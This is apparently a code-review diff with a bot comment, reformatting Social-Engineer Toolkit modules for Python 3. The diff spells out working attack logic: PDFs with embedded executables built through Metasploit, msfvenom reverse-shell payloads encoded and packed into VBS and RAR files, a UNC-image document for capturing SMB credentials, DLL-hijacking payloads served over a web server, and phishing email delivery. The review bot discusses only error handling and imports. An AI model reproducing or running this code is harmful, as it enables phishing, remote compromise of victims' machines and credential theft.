|
||||||
print """
|
"Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
|
||||||
|
print("""
|
||||||
1. Use your own PDF for attack
|
1. Use your own PDF for attack
|
||||||
2. Use built-in BLANK PDF for attack\n"""
|
2. Use built-in BLANK PDF for attack\n""")
|
||||||
|
|
||||||
choicepdf = raw_input(setprompt(["4"], ""))
|
choicepdf = raw_input(setprompt(["4"], ""))
|
||||||
|
|
||||||
|
@ -106,92 +111,97 @@ if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit ==
|
||||||
|
|
||||||
if choicepdf == '1':
|
if choicepdf == '1':
|
||||||
# define if user wants to use their own pdf or built in one
|
# define if user wants to use their own pdf or built in one
|
||||||
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
|
inputpdf = raw_input(
|
||||||
|
setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
|
||||||
# if blank, then default to normal pdf
|
# if blank, then default to normal pdf
|
||||||
if inputpdf == "":
|
if inputpdf == "":
|
||||||
# change to default SET pdf
|
# change to default SET pdf
|
||||||
print_info("Defaulting to BLANK PDF built into SET...")
|
print_info("Defaulting to BLANK PDF built into SET...")
|
||||||
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
|
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
|
||||||
# if no file exists defalt this
|
# if no file exists defalt this
|
||||||
if not os.path.isfile(inputpdf):
|
if not os.path.isfile(inputpdf):
|
||||||
print_warning("Unable to find PDF, defaulting to blank PDF.")
|
print_warning("Unable to find PDF, defaulting to blank PDF.")
|
||||||
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
|
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
|
||||||
|
|
||||||
if choicepdf == '2':
|
if choicepdf == '2':
|
||||||
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
|
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
|
||||||
|
|
||||||
if choicepdf == "":
|
if choicepdf == "":
|
||||||
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
|
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
|
||||||
|
|
||||||
exploit_counter=0
|
exploit_counter = 0
|
||||||
|
|
||||||
if exploit == "dll_hijacking" or exploit == "unc_embed":
|
if exploit == "dll_hijacking" or exploit == "unc_embed":
|
||||||
exploit_counter=1
|
exploit_counter = 1
|
||||||
|
|
||||||
if exploit_counter == 0:
|
if exploit_counter == 0:
|
||||||
|
|
||||||
###################################################
|
###################################################
|
||||||
# USER INPUT: SHOW PAYLOAD MENU 3 #
|
# USER INPUT: SHOW PAYLOAD MENU 3 #
|
||||||
###################################################
|
###################################################
|
||||||
debug_msg(me,"printing 'src.core.menu.text.payload_menu_3'",5)
|
debug_msg(me, "printing 'src.core.menu.text.payload_menu_3'", 5)
|
||||||
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
|
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
|
||||||
payload=raw_input(setprompt(["4"], ""))
|
payload = raw_input(setprompt(["4"], ""))
|
||||||
noencode=0
|
noencode = 0
|
||||||
|
|
||||||
if payload == 'exit':
|
if payload == 'exit':
|
||||||
exit_set()
|
exit_set()
|
||||||
|
|
||||||
if payload == "" : payload="2"
|
if payload == "":
|
||||||
|
payload = "2"
|
||||||
if payload == '4' or payload == '5' or payload == '6':
|
if payload == '4' or payload == '5' or payload == '6':
|
||||||
noencode=1
|
noencode = 1
|
||||||
|
|
||||||
payload=ms_payload_3(payload)
|
|
||||||
|
|
||||||
|
payload = ms_payload_3(payload)
|
||||||
|
|
||||||
# imported from central, grabs ip address
|
# imported from central, grabs ip address
|
||||||
rhost=grab_ipaddress()
|
rhost = grab_ipaddress()
|
||||||
|
|
||||||
# SET LPORT
|
# SET LPORT
|
||||||
lport=raw_input(setprompt(["4"], "Port to connect back on [443]"))
|
lport = raw_input(setprompt(["4"], "Port to connect back on [443]"))
|
||||||
|
|
||||||
# if blank default to 443
|
# if blank default to 443
|
||||||
if lport == "":
|
if lport == "":
|
||||||
lport="443"
|
lport = "443"
|
||||||
print_info("Defaulting to port 443...")
|
print_info("Defaulting to port 443...")
|
||||||
|
|
||||||
# SET FILE OUTPATH
|
# SET FILE OUTPATH
|
||||||
# /root/.msf4/local/msf.pdf
|
# /root/.msf4/local/msf.pdf
|
||||||
filename_code = outfile
|
filename_code = outfile
|
||||||
if os.path.isdir(users_home + "/.msf4/"):
|
if os.path.isdir(users_home + "/.msf4/"):
|
||||||
msfpath = (users_home + "/.msf4/")
|
msfpath = (users_home + "/.msf4/")
|
||||||
|
|
||||||
if os.path.isdir(users_home + "/.msf5/"):
|
if os.path.isdir(users_home + "/.msf5/"):
|
||||||
msfpath = (users_home + "/.msf5/")
|
msfpath = (users_home + "/.msf5/")
|
||||||
|
|
||||||
outpath=(msfpath + "local/" + outfile)
|
outpath = (msfpath + "local/" + outfile)
|
||||||
print_info("Generating fileformat exploit...")
|
print_info("Generating fileformat exploit...")
|
||||||
# START THE EXE TO VBA PAYLOAD
|
# START THE EXE TO VBA PAYLOAD
|
||||||
if exploit != 'custom/exe/to/vba/payload':
|
if exploit != 'custom/exe/to/vba/payload':
|
||||||
output = setdir + "/%s" % (outfile)
|
output = setdir + "/%s" % (outfile)
|
||||||
if os.path.isfile(setdir + "/template.pdf"):
|
if os.path.isfile(setdir + "/template.pdf"):
|
||||||
os.remove(setdir + "/template.pdf")
|
os.remove(setdir + "/template.pdf")
|
||||||
if os.path.isfile(msfpath + "local/template.pdf"):
|
if os.path.isfile(msfpath + "local/template.pdf"):
|
||||||
os.remove(msfpath + "local/template.pdf")
|
os.remove(msfpath + "local/template.pdf")
|
||||||
|
|
||||||
filewrite = file(setdir + "/template.rc", "w")
|
filewrite = file(setdir + "/template.rc", "w")
|
||||||
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" % (rhost,lport,inputpdf,output))
|
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" %
|
||||||
filewrite.close()
|
(rhost, lport, inputpdf, output))
|
||||||
child = pexpect.spawn("%smsfconsole -r %s/template.rc" % (meta_path, setdir))
|
filewrite.close()
|
||||||
a = 1
|
child = pexpect.spawn(
|
||||||
while a == 1:
|
"%smsfconsole -r %s/template.rc" % (meta_path, setdir))
|
||||||
if os.path.isfile(setdir + "/template.pdf"):
|
a = 1
|
||||||
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
|
while a == 1:
|
||||||
a = 2 #break
|
if os.path.isfile(setdir + "/template.pdf"):
|
||||||
else:
|
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir),
|
||||||
print_status("Waiting for payload generation to complete...")
|
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
|
||||||
if os.path.isfile(msfpath + "local/" + outfile):
|
a = 2 # break
|
||||||
subprocess.Popen("cp %slocal/%s %s" % (msfpath, outfile,setdir), shell=True)
|
else:
|
||||||
time.sleep(3)
|
print_status("Waiting for payload generation to complete...")
|
||||||
|
if os.path.isfile(msfpath + "local/" + outfile):
|
||||||
|
subprocess.Popen("cp %slocal/%s %s" %
|
||||||
|
(msfpath, outfile, setdir), shell=True)
|
||||||
|
time.sleep(3)
|
||||||
|
|
||||||
print_status("Payload creation complete.")
|
print_status("Payload creation complete.")
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
|
@ -200,99 +210,120 @@ if exploit_counter == 0:
|
||||||
# Creating Payload here
|
# Creating Payload here
|
||||||
# if not 64 specify raw output and filename of vb1.exe
|
# if not 64 specify raw output and filename of vb1.exe
|
||||||
if noencode == 0:
|
if noencode == 0:
|
||||||
execute1=("raw")
|
execute1 = ("raw")
|
||||||
payloadname=("vb1.exe")
|
payloadname = ("vb1.exe")
|
||||||
if noencode == 1:
|
if noencode == 1:
|
||||||
execute1=("exe")
|
execute1 = ("exe")
|
||||||
payloadname=("vb.exe")
|
payloadname = ("vb.exe")
|
||||||
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True)
|
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
|
||||||
|
(meta_path, payload, rhost, lport, execute1, setdir, payloadname), shell=True)
|
||||||
if noencode == 0:
|
if noencode == 0:
|
||||||
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True)
|
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
|
||||||
|
(meta_path, setdir, setdir), shell=True)
|
||||||
# Create the VB script here
|
# Create the VB script here
|
||||||
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True)
|
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
|
||||||
|
(meta_path, setdir, setdir), shell=True)
|
||||||
print_info("Raring the VBS file.")
|
print_info("Raring the VBS file.")
|
||||||
subprocess.Popen("rar a %s/template.rar %s/template.vbs" % (setdir,setdir), shell=True)
|
subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
|
||||||
|
(setdir, setdir), shell=True)
|
||||||
|
|
||||||
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
|
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
|
||||||
filewrite=file(setdir + "/payload.options","w")
|
filewrite = file(setdir + "/payload.options", "w")
|
||||||
filewrite.write(payload+" "+rhost+" "+lport)
|
filewrite.write(payload + " " + rhost + " " + lport)
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
if exploit != "dll_hijacking":
|
if exploit != "dll_hijacking":
|
||||||
if not os.path.isfile(setdir + "/fileformat.file"):
|
if not os.path.isfile(setdir + "/fileformat.file"):
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me,"importing 'src.phishing.smtp.client.smtp_client'",1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
|
|
||||||
# start the unc_embed attack stuff here
|
# start the unc_embed attack stuff here
|
||||||
if exploit == "unc_embed":
|
if exploit == "unc_embed":
|
||||||
rhost=grab_ipaddress
|
rhost = grab_ipaddress
|
||||||
import string,random
|
import string
|
||||||
def random_string(minlength=6,maxlength=15):
|
import random
|
||||||
length=random.randint(minlength,maxlength)
|
|
||||||
letters=string.ascii_letters+string.digits
|
def random_string(minlength=6, maxlength=15):
|
||||||
|
length = random.randint(minlength, maxlength)
|
||||||
|
letters = string.ascii_letters + string.digits
|
||||||
return ''.join([random.choice(letters) for _ in range(length)])
|
return ''.join([random.choice(letters) for _ in range(length)])
|
||||||
rand_gen=random_string()
|
rand_gen = random_string()
|
||||||
filewrite=file(setdir + "/unc_config", "w")
|
filewrite = file(setdir + "/unc_config", "w")
|
||||||
filewrite.write("use server/capture/smb\n")
|
filewrite.write("use server/capture/smb\n")
|
||||||
filewrite.write("exploit -j\r\n\r\n")
|
filewrite.write("exploit -j\r\n\r\n")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
filewrite=file(setdir + "/template.doc", "w")
|
filewrite = file(setdir + "/template.doc", "w")
|
||||||
filewrite.write(r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' %(rhost,rand_gen))
|
filewrite.write(
|
||||||
|
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'",1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
|
|
||||||
# start the dll_hijacking stuff here
|
# start the dll_hijacking stuff here
|
||||||
if exploit == "dll_hijacking":
|
if exploit == "dll_hijacking":
|
||||||
sys.path.append("src/core/payloadgen")
|
sys.path.append("src/core/payloadgen")
|
||||||
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'",1)
|
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
|
||||||
try: reload(create_payloads)
|
try:
|
||||||
except: import create_payloads
|
reload(create_payloads)
|
||||||
|
except:
|
||||||
|
import create_payloads
|
||||||
|
|
||||||
sys.path.append("src/webattack/dll_hijacking")
|
sys.path.append("src/webattack/dll_hijacking")
|
||||||
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'",1)
|
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
|
||||||
try: reload(hijacking)
|
try:
|
||||||
except: import hijacking
|
reload(hijacking)
|
||||||
|
except:
|
||||||
|
import hijacking
|
||||||
|
|
||||||
# if we are not using apache
|
# if we are not using apache
|
||||||
if apache == 0:
|
if apache == 0:
|
||||||
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||||
# try:
|
# try:
|
||||||
filewrite=file(setdir + "/attack_vector","w")
|
filewrite = file(setdir + "/attack_vector", "w")
|
||||||
filewrite.write("hijacking")
|
filewrite.write("hijacking")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
filewrite=file(setdir + "/site.template","w")
|
filewrite = file(setdir + "/site.template", "w")
|
||||||
filewrite.write("TEMPLATE=CUSTOM")
|
filewrite.write("TEMPLATE=CUSTOM")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
|
||||||
child=pexpect.spawn("python src/html/web_server.py")
|
setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||||
|
child = pexpect.spawn("python src/html/web_server.py")
|
||||||
# except: child.close()
|
# except: child.close()
|
||||||
# if we are using apache
|
# if we are using apache
|
||||||
if apache == 1:
|
if apache == 1:
|
||||||
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
|
subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
|
||||||
|
(apache_path), shell=True).wait()
|
||||||
|
|
||||||
if os.path.isfile(setdir + "/meta_config"):
|
if os.path.isfile(setdir + "/meta_config"):
|
||||||
# if we aren't using the infectious method then do normal routine
|
# if we aren't using the infectious method then do normal routine
|
||||||
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||||
print_info("This may take a few to load MSF...")
|
print_info("This may take a few to load MSF...")
|
||||||
try:
|
try:
|
||||||
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
|
child1 = pexpect.spawn(
|
||||||
|
"%smsfconsole -L -r %s/meta_config" % (meta_path, setdir))
|
||||||
except:
|
except:
|
||||||
try:
|
try:
|
||||||
child1.close()
|
child1.close()
|
||||||
except: pass
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
# get the emails out
|
# get the emails out
|
||||||
# if we aren't using the infectious method then do the normal routine
|
# if we aren't using the infectious method then do the normal routine
|
||||||
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'",1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
try:
|
try:
|
||||||
child1.interact()
|
child1.interact()
|
||||||
except:
|
except:
|
||||||
|
@ -300,4 +331,5 @@ if exploit == "dll_hijacking":
|
||||||
try:
|
try:
|
||||||
child.close()
|
child.close()
|
||||||
child1.close()
|
child1.close()
|
||||||
except: pass
|
except:
|
||||||
|
pass
|
||||||
|
|
|
@ -7,9 +7,12 @@ import sys
|
||||||
me = mod_name()
|
me = mod_name()
|
||||||
|
|
||||||
sys.path.append("src/core")
|
sys.path.append("src/core")
|
||||||
debug_msg(me,"re-importing 'src.core.setcore'",1)
|
debug_msg(me, "re-importing 'src.core.setcore'", 1)
|
||||||
try: reload(setcore)
|
try:
|
||||||
except: import setcore
|
reload(setcore)
|
||||||
print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]"
|
except:
|
||||||
generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
|
import setcore
|
||||||
print "[---] Database is now up-to-date [---]"
|
print("[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]")
|
||||||
|
generate_list = subprocess.Popen(
|
||||||
|
"%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
|
||||||
|
print("[---] Database is now up-to-date [---]")
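Review bot: The exit status bound to `generate_list` on the new `subprocess.Popen(...).wait()` line is never checked, and because the shell opens the `>` redirect before `msfcli` runs, a missing or failing `msfcli` leaves `src/core/msf_attacks/database/msf.database` truncated to empty while the next line still prints that the database is up to date; add `if generate_list != 0: print_error("msfcli failed - msf.database was not regenerated")` between the two (assuming `print_error` from setcore is in scope here as it is elsewhere in this commit). The `%s/msfcli` interpolation also differs from the `%smsfconsole` / `%smsfvenom` form used in the other file of this commit, so an empty `meta_path` would become `/msfcli` here; presumably one convention should be picked. For a commit described as a Python 3 refactor, `reload(setcore)` is a Python 2 builtin: under Python 3 it raises NameError, which the bare `except:` swallows before falling back to `import setcore`, so `from importlib import reload` (or narrowing to `except (NameError, ImportError):`) would make the intent explicit. The file header for this section is not shown in the visible page.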
|
||||||
|
|